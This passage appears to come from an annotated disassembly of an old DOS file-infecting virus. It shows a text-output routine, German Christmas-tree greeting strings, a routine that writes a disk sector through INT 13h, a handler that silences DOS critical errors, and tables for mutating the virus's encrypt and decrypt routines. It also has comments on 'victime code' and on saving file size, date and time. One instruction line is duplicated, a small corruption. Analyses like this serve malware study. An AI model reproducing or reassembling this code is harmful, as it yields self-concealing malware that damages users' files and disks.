0664 EBF4 jmp 065A ; get next character
|
||
0666 C3 ret
|
||
|
||
;--------------------
|
||
; write character TTL
|
||
|
||
0667 52 push dx
|
||
0668 51 push cx
|
||
0669 53 push bx
|
||
066A 32FF xor bh,bh
|
||
066C B40E mov ah,0E
|
||
066E CD10 int 10
|
||
0670 5B pop bx
|
||
0671 59 pop cx
|
||
0671 59 pop cx
|
||
0672 5A pop dx
|
||
0673 C3 ret
|
||
|
||
0674 55 6E 64 20 65 72 20 6C Und er l
|
||
067C 65 62 74 20 64 6F 63 68 ebt doch
|
||
0684 20 6E 6F 63 68 20 3A 20 noch :
|
||
068C 44 65 72 20 54 61 6E 6E Der Tann
|
||
0694 65 6E 62 61 75 6D 20 21 enbaum !
|
||
069C 0D 0A 00 46 72 6F 68 65 Frohe
|
||
06A4 20 57 65 69 68 6E 61 63 Weihnac
|
||
06AC 68 74 65 6E 20 2E 2E 2E hten ...
|
||
06B4 0D 0A 07 00
|
||
|
||
;------------------------------------------
|
||
; write one sector to disk specified in DL
|
||
; track 9, side 0 sector 1
|
||
|
||
06B8 32F6 xor dh,dh
|
||
06BA B90100 mov cx,0001
|
||
06BD BB3706 mov bx,0637
|
||
06C0 B80103 mov ax,0301
|
||
06C3 CD13 int 13
|
||
06C5 C3 ret
|
||
|
||
;==================
|
||
; INT 24h handler
|
||
|
||
06C6 B000 mov al,00
|
||
06C8 CF iret
|
||
|
||
; table of bytes for changing encrypt routine
|
||
|
||
06C9 5E 00 0F 43
|
||
06CD 5E 30 0F 43
|
||
06D1 5E D2 07 43
|
||
06D5 76 00 0C 46
|
||
06D9 76 30 0C 46
|
||
06DD 76 D2 04 46
|
||
06E1 7E 00 0D 47
|
||
06E5 7E 30 0D 47
|
||
06E9 7E D2 05 47
|
||
|
||
; table for variants of decrypt routine
|
||
|
||
06ED 28 30 D2
|
||
|
||
; part of victime code
|
||
|
||
06F0 F3A4 rep movsb
|
||
06F2 8BF1 mov si,cx
|
||
06F4 8BF9 mov di,cx
|
||
06F6 C3 ret
|
||
|
||
06F7 0307 ; offset of buffer/modified code
|
||
06F9 DB63 ; file size + 256
|
||
06FB C603 ;
|
||
06FD 0306 ;
|
||
06FF 0060 ; file date
|
||
0701 710E ; file time
|
||
|